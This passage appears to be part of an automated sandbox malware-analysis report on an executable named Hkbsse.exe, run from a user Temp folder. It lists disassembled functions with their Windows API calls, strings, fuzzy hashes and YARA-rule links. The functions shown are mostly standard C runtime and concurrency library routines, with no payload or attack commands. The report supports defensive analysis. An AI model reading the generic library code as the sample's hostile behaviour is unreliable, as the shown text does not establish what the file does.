                      • Part of subcall function 0042B622: SetEvent.KERNEL32(?,?,0042A1D7,0042AF6B,00000000,?,00000000,0042AF6B,00000004,0042B617,?,00000000,?,?,00000000), ref: 0042B666
                    • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 0042A1DB
                      • Part of subcall function 0042AC51: List.LIBCONCRT ref: 0042AC87
                    • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 0042A1EB
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Proxy::Scheduler$AffinityThread$Concurrency::details::platform::__CoreCurrentExecutionGroupHardwareIncrement$Affinity::BorrowedCountEventFixedListResourceResource::StateSubscriptionToggle
                    • String ID:
                    • API String ID: 318399070-0
                    • Opcode ID: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
                    • Instruction ID: fe86043d0ec5758fdeb7fa1791ef53b29c71cd57ba806e603e01c4068b965251
                    • Opcode Fuzzy Hash: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
                    • Instruction Fuzzy Hash: 8E21B031600B249FCB24EF66E9508BBF3F4FF48304740455EE942A7651CB78E905CBAA
                    Function 044AA39D Relevance: 9.1, APIs: 6, Instructions: 73threadCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 044AA3E0
                      • Part of subcall function 044AB8D7: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 044AB926
                    • GetCurrentThread.KERNEL32 ref: 044AA3EA
                    • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 044AA3F6
                      • Part of subcall function 044A06FF: Concurrency::details::platform::__GetThreadGroupAffinity.LIBCONCRT ref: 044A0711
                      • Part of subcall function 044A0B8B: Concurrency::details::platform::__SetThreadGroupAffinity.LIBCONCRT ref: 044A0B92
                    • Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCONCRT ref: 044AA439
                      • Part of subcall function 044AB889: SetEvent.KERNEL32(?,?,044AA43E,044AB1D2,00000000,?,00000000,044AB1D2,00000004,044AB87E,?,00000000,?,?,00000000), ref: 044AB8CD
                    • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 044AA442
                      • Part of subcall function 044AAEB8: __EH_prolog3.LIBCMT ref: 044AAEBF
                      • Part of subcall function 044AAEB8: List.LIBCONCRT ref: 044AAEEE
                    • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 044AA452
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Proxy::Scheduler$AffinityThread$Concurrency::details::platform::__CoreCurrentExecutionGroupHardwareIncrement$Affinity::BorrowedCountEventFixedH_prolog3ListResourceResource::StateSubscriptionToggle
                    • String ID:
                    • API String ID: 2908504212-0
                    • Opcode ID: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
                    • Instruction ID: a74da15316cd2bb3fc8a855021cdb9ca4d5ecf75eb018558b03dc562fa097363
                    • Opcode Fuzzy Hash: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
                    • Instruction Fuzzy Hash: 2D21AC31500B119FDF24EF66C9908ABB3F9FF5C208700491EE942A7651DB34B905CBA5
                    Function 00435048 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(?,?,0043503F,00433C00,0041B665,13877BC0,?,00000000,0044B448,000000FF,?,004023EA,?,?), ref: 00435056
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00435064
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043507D
                    • SetLastError.KERNEL32(00000000,?,0043503F,00433C00,0041B665,13877BC0,?,00000000,0044B448,000000FF,?,004023EA,?,?), ref: 004350CF
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: b07de53ced0629e77d54eea71d233bc361282fd8b55c12240ca057c3c3e4afae
                    • Instruction ID: 8d24dae537e6274fcf49c1697837548d04e0bffea64ecaf3a521acfb1b817ace
                    • Opcode Fuzzy Hash: b07de53ced0629e77d54eea71d233bc361282fd8b55c12240ca057c3c3e4afae
                    • Instruction Fuzzy Hash: 9A01453220EF226EA22826756C81A1B2665EB09738F30223FF224451E1FECB480092CD
                    Function 044B52AF Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(?,?,044B52A6,044B3E67,0449B8CC,00462014,?,00000000,0044B448,000000FF,?,04482651,?,?), ref: 044B52BD
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 044B52CB
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 044B52E4
                    • SetLastError.KERNEL32(00000000,?,044B52A6,044B3E67,0449B8CC,00462014,?,00000000,0044B448,000000FF,?,04482651,?,?), ref: 044B5336
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: b07de53ced0629e77d54eea71d233bc361282fd8b55c12240ca057c3c3e4afae
                    • Instruction ID: 0d784a8bdfe52875473400a6bd0a2a7d98426f5af0f52f156d8ed7a491310b88
                    • Opcode Fuzzy Hash: b07de53ced0629e77d54eea71d233bc361282fd8b55c12240ca057c3c3e4afae
                    • Instruction Fuzzy Hash: E301F53260DB217EBF242B757C455E76745EB0167C720123FE394402E1FEE2680296E9
                    Function 0041FD2B Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FD39
                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FD3F
                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FD6C
                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FD76
                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FD88
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041FD9E
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                    • String ID:
                    • API String ID: 2808382621-0
                    • Opcode ID: c0a4f277fe568b30ff606a76a18e0e24afb7e465af144ec3c514b72e4719e68f
                    • Instruction ID: 4f3bf0f7770c7e5986951e0f5cc567661e6afe5f20b1112d50d855a3cbefbd6a
                    • Opcode Fuzzy Hash: c0a4f277fe568b30ff606a76a18e0e24afb7e465af144ec3c514b72e4719e68f
                    • Instruction Fuzzy Hash: B401FC3554021567DB10ABB2FC05BFF3768EF41712B10483BF402D1152DB2CE94A876D
                    Function 00434F2B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMON
                    Download Yara Rule
                    APIs
                    • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00434F7E
                    • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00434F97
                    • PMDtoOffset.LIBCMT ref: 00434FBD
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: FindInstanceTargetType$Offset
                    • String ID: Bad dynamic_cast!
                    • API String ID: 1467055271-2956939130
                    • Opcode ID: 0521f5f12162b5f940dd835c7097114a2cc624e250e977d47238f7f30b439742
                    • Instruction ID: c3d998d34e3c5e6d783fab50cb8decc3bcb55afa041ecdf7956987aee26e1d96
                    • Opcode Fuzzy Hash: 0521f5f12162b5f940dd835c7097114a2cc624e250e977d47238f7f30b439742
                    • Instruction Fuzzy Hash: CB212732A04205AFDF14DF64D906EEE77A4EBCC724F24521BF90493280DB39FD0186A9
                    Function 00431938 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85threadCOMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00431993
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004319B2
                    • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 004319F9
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$ExecutionFreeIdleProcessorProxy::Root::SpinSuspendThreadUntilVirtualstd::invalid_argument::invalid_argument
                    • String ID: pContext
                    • API String ID: 1284976207-2046700901
                    • Opcode ID: 7696fed31027723f35f026be7f56ee9a288ab6992535e51fad3a21373ee75dd4
                    • Instruction ID: 1c2ff945bfb3779234e5a6cf3f9012e4fdc6cf8487c5ad4306e8c2bd46a22409
                    • Opcode Fuzzy Hash: 7696fed31027723f35f026be7f56ee9a288ab6992535e51fad3a21373ee75dd4
                    • Instruction Fuzzy Hash: 52212935700215ABCB18AB25D8A4B7E73A5BF98335F04116BE511873F2CF6CAC45CA99
                    Function 0043E086 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                    Download Yara Rule
                    Strings
                    • C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe, xrefs: 0043E08B
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                    • API String ID: 0-2480956006
                    • Opcode ID: d976a1582a0ea40e6d34111d7caa758c1d1378cc5cd5895febd347388f405018
                    • Instruction ID: f4dc822ff7adfef32422cf1d068892eb60ac2f919edbcc6374e1cafa7be57565
                    • Opcode Fuzzy Hash: d976a1582a0ea40e6d34111d7caa758c1d1378cc5cd5895febd347388f405018
                    • Instruction Fuzzy Hash: C121C5B1605215BFDB206F639C81E6777BDEF08368F20651AF52497381E779EC408BA8
                    Function 044BE2ED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                    Download Yara Rule
                    Strings
                    • C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe, xrefs: 044BE2F2
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                    • API String ID: 0-2480956006
                    • Opcode ID: c2b0de2763c86ad6614d27659a9b599b6b937d4051c2e6d32a144a313df7ce7a
                    • Instruction ID: f9576f3b05c2e6fb0549964e272d8bde7653e829757a3beb88b5eb4c0c2c0fb7
                    • Opcode Fuzzy Hash: c2b0de2763c86ad6614d27659a9b599b6b937d4051c2e6d32a144a313df7ce7a
                    • Instruction Fuzzy Hash: AD217171604705AFEF209E729C809EB7768EB80268720551AE9AD96691EB31FC419BF0
                    Function 004372A9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _wcsrchr
                    • String ID: .bat$.cmd$.com$.exe
                    • API String ID: 1752292252-4019086052
                    • Opcode ID: 76ed5b3c9a0d73b5894b50308dce038bad0a816de482078dd29a63f31f2b0ceb
                    • Instruction ID: d16564c9a29a3a8969ec7240e5edfb42ca856ad351659fd50751cb54bcf8bce3
                    • Opcode Fuzzy Hash: 76ed5b3c9a0d73b5894b50308dce038bad0a816de482078dd29a63f31f2b0ceb
                    • Instruction Fuzzy Hash: 23010867608616312635A0199C02B7B57988F9ABB4F25102FFC94F76C3DE8CDC0291EC
                    Function 00424FB2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulingNode::AddVirtualProcessor.LIBCONCRT ref: 00425011
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00425034
                    • Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 00425076
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: CacheConcurrency::details::GroupLocalSchedule$Node::ProcessorSchedulingSegmentSegment::Virtualstd::invalid_argument::invalid_argument
                    • String ID: count$ppVirtualProcessorRoots
                    • API String ID: 18808576-3650809737
                    • Opcode ID: ee74751cda2579e54f441aeaee73b0045bcbbb17f9a78e7efd1f60961086b841
                    • Instruction ID: 305bc4034c2cb983e96c2d8fe25bce993a68233bb1d7dc822cb2e33d84effcaf
                    • Opcode Fuzzy Hash: ee74751cda2579e54f441aeaee73b0045bcbbb17f9a78e7efd1f60961086b841
                    • Instruction Fuzzy Hash: 6821E035B00225EFCB04EF69D881AAD73A1FF48304F50402FE90597691DF75AE01CB89
                    Function 0043A711 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(?,?,?,00436A5A,?,?,?,?,0043768E,?), ref: 0043A716
                    • _free.LIBCMT ref: 0043A773
                    • _free.LIBCMT ref: 0043A7A9
                    • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,00436A5A,?,?,?,?,0043768E,?), ref: 0043A7B4
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_free
                    • String ID: x!F
                    • API String ID: 2283115069-3062043068
                    • Opcode ID: 826befe5908a36a329c0b68ecd7869063ec108b53a76503526fd19857e2e3b2b
                    • Instruction ID: be7c44a1fb34d1c37a26770ceb7c848a23a0808e2611b486d4a83bfcf4870b79
                    • Opcode Fuzzy Hash: 826befe5908a36a329c0b68ecd7869063ec108b53a76503526fd19857e2e3b2b
                    • Instruction Fuzzy Hash: 9A110D312847003AD61127755CC6E2B2169D7D9379F25213FF360862D1EFADCC16425F
                    Function 0043A868 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(?,?,?,00437628,00402207), ref: 0043A86D
                    • _free.LIBCMT ref: 0043A8CA
                    • _free.LIBCMT ref: 0043A900
                    • SetLastError.KERNEL32(00000000,00000008,000000FF,?,00437628,00402207), ref: 0043A90B
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_free
                    • String ID: x!F
                    • API String ID: 2283115069-3062043068
                    • Opcode ID: c8ad822cd170ee70e40dfd3b9bf10ba13b5f2f5e684597da726ebd4380a789db
                    • Instruction ID: b986b1826898f37416bf5ced70f3374c8b36f31c2da29752778e1ed8a3b37dc0
                    • Opcode Fuzzy Hash: c8ad822cd170ee70e40dfd3b9bf10ba13b5f2f5e684597da726ebd4380a789db
                    • Instruction Fuzzy Hash: 5A112C312847003AC61573755C42F2B2259EBC93B9F24213FF264962D1EA6D8C17411F
                    Function 004360C7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: api-ms-
                    • API String ID: 0-2084034818
                    • Opcode ID: 0f756fd091728f1714fffd2efd6505197b9063550eda6cdbc8ad120b831c3f96
                    • Instruction ID: 24afc57fe78e1c6608cbdf562ed4d7e6d93aa0af096ef472e59e5906e3cd28f5
                    • Opcode Fuzzy Hash: 0f756fd091728f1714fffd2efd6505197b9063550eda6cdbc8ad120b831c3f96
                    • Instruction Fuzzy Hash: 7E110F31A01326BBCF324B68DC44A1F77659F09771F225123ED16A7392D674ED00C6E8
                    Function 004321A5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON
                    Download Yara Rule
                    APIs
                    • StructuredWorkStealingQueue.LIBCMT ref: 004321C5
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004321D6
                    • StructuredWorkStealingQueue.LIBCMT ref: 0043220C
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0043221D
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured
                    • String ID: e
                    • API String ID: 3804418703-4024072794
                    • Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                    • Instruction ID: 9b603a7df0a9b275827e5962de0d870e8733e561ac416f5c4f25b928dcbe72b5
                    • Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                    • Instruction Fuzzy Hash: D911E7311001019BDF55DE69DF41A6B73A49F0A364F1890ABEC069F202CAB9D901CB99
                    Function 044B240C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON
                    Download Yara Rule
                    APIs
                    • StructuredWorkStealingQueue.LIBCMT ref: 044B242C
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 044B243D
                    • StructuredWorkStealingQueue.LIBCMT ref: 044B2473
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 044B2484
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured
                    • String ID: e
                    • API String ID: 3804418703-4024072794
                    • Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                    • Instruction ID: 545fb13d29a4e1905a2066eddfe4540c4f7135683e440d8472697d57eb1e8286
                    • Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                    • Instruction Fuzzy Hash: 9111C8312002009BEF54DE2DC8496EB73A4BF11254B14C5EBAC869F612DBB0F9018BF1
                    Function 0043667D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00436672,?,?,0043663A,?,?,?), ref: 00436692
                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004366A5
                    • FreeLibrary.KERNEL32(00000000,?,?,00436672,?,?,0043663A,?,?,?), ref: 004366C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$mscoree.dll
                    • API String ID: 4061214504-1276376045
                    • Opcode ID: 149a4b1e0247f71675fe1653e9c2ac55fef454062cb741321ed7f61413657623
                    • Instruction ID: a844e345ecaf6b3645b807ab58af657e8cb037a566189496e486508311f4ef5d
                    • Opcode Fuzzy Hash: 149a4b1e0247f71675fe1653e9c2ac55fef454062cb741321ed7f61413657623
                    • Instruction Fuzzy Hash: 8EF08235501319FBCB119B91DD0EB9E7A79EB04797F104062FC04A22A1CB78CE04DB9C
                    Function 00446849 Relevance: 7.7, APIs: 5, Instructions: 244COMMON
                    Download Yara Rule
                    APIs
                    • GetCPInfo.KERNEL32(02881D48,02881D48,?,7FFFFFFF,?,?,00446B05,02881D48,02881D48,?,02881D48,?,?,?,?,02881D48), ref: 004468EC
                    • __alloca_probe_16.LIBCMT ref: 004469A2
                    • __alloca_probe_16.LIBCMT ref: 00446A38
                    • __freea.LIBCMT ref: 00446AA3
                    • __freea.LIBCMT ref: 00446AAF
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: __alloca_probe_16__freea$Info
                    • String ID:
                    • API String ID: 2330168043-0
                    • Opcode ID: cbaa4673f5ff8862db29272040ab2082dd50e9928e22af3abc04efc5db2fe98c
                    • Instruction ID: 10efd5a829d972edac5f7f177fa14af3cd2182f54b741c455361477a6b2ea80f
                    • Opcode Fuzzy Hash: cbaa4673f5ff8862db29272040ab2082dd50e9928e22af3abc04efc5db2fe98c
                    • Instruction Fuzzy Hash: AD810472D006059BEF209E658841AEF7BB9EF4B714F1A401BE904B7240E779CC45CBAA
                    Function 00444CB4 Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                    Download Yara Rule
                    APIs
                    • __alloca_probe_16.LIBCMT ref: 00444D38
                    • __alloca_probe_16.LIBCMT ref: 00444DFE
                    • __freea.LIBCMT ref: 00444E6A
                      • Part of subcall function 0043B0EB: HeapAlloc.KERNEL32(00000000,?,?,?,0043E590,00000220,?,?,?,?,?,?,0043768E,?), ref: 0043B11D
                    • __freea.LIBCMT ref: 00444E73
                    • __freea.LIBCMT ref: 00444E96
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: __freea$__alloca_probe_16$AllocHeap
                    • String ID:
                    • API String ID: 1096550386-0
                    • Opcode ID: ed981a726e34d29eec07117bbe85d43771450238645a1f4fbecfa0b3ca24f07d
                    • Instruction ID: e3ec7627a5ea34dccdb9b477d1aea9347458ee8b8e155340acbb0e069fb26b32
                    • Opcode Fuzzy Hash: ed981a726e34d29eec07117bbe85d43771450238645a1f4fbecfa0b3ca24f07d
                    • Instruction Fuzzy Hash: 1C51A372A00216AFFB215F95DC81FAB77A9EFC4764F25012BFD0497250E738DC5186A8
                    Function 00436FE1 Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetFileType.KERNEL32(?,?,00000000,00000000), ref: 00437003
                    • GetFileInformationByHandle.KERNEL32(?,?), ref: 0043705D
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00436F13,?,000000FF), ref: 004370EB
                    • __dosmaperr.LIBCMT ref: 004370F2
                    • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0043712F
                      • Part of subcall function 00437357: __dosmaperr.LIBCMT ref: 0043738C
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                    • String ID:
                    • API String ID: 1206951868-0
                    • Opcode ID: fd94452bb283925db15eed2e4757c18caa3077711e278af8bdb9b3e6b693ea09
                    • Instruction ID: 86b53b091d5339d90dada3391adf114cdc1a48250b9c16bee365c924aaea3f03
                    • Opcode Fuzzy Hash: fd94452bb283925db15eed2e4757c18caa3077711e278af8bdb9b3e6b693ea09
                    • Instruction Fuzzy Hash: 6C414EB6904704ABDB389FA6DC459AFBBF9EF48300B10542EF596D3610E6389840CB55
                    Function 044B7248 Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetFileType.KERNEL32(?,?,00000000,00000000), ref: 044B726A
                    • GetFileInformationByHandle.KERNEL32(?,?), ref: 044B72C4
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,044B717A,?,000000FF), ref: 044B7352
                    • __dosmaperr.LIBCMT ref: 044B7359
                    • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 044B7396
                      • Part of subcall function 044B75BE: __dosmaperr.LIBCMT ref: 044B75F3
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
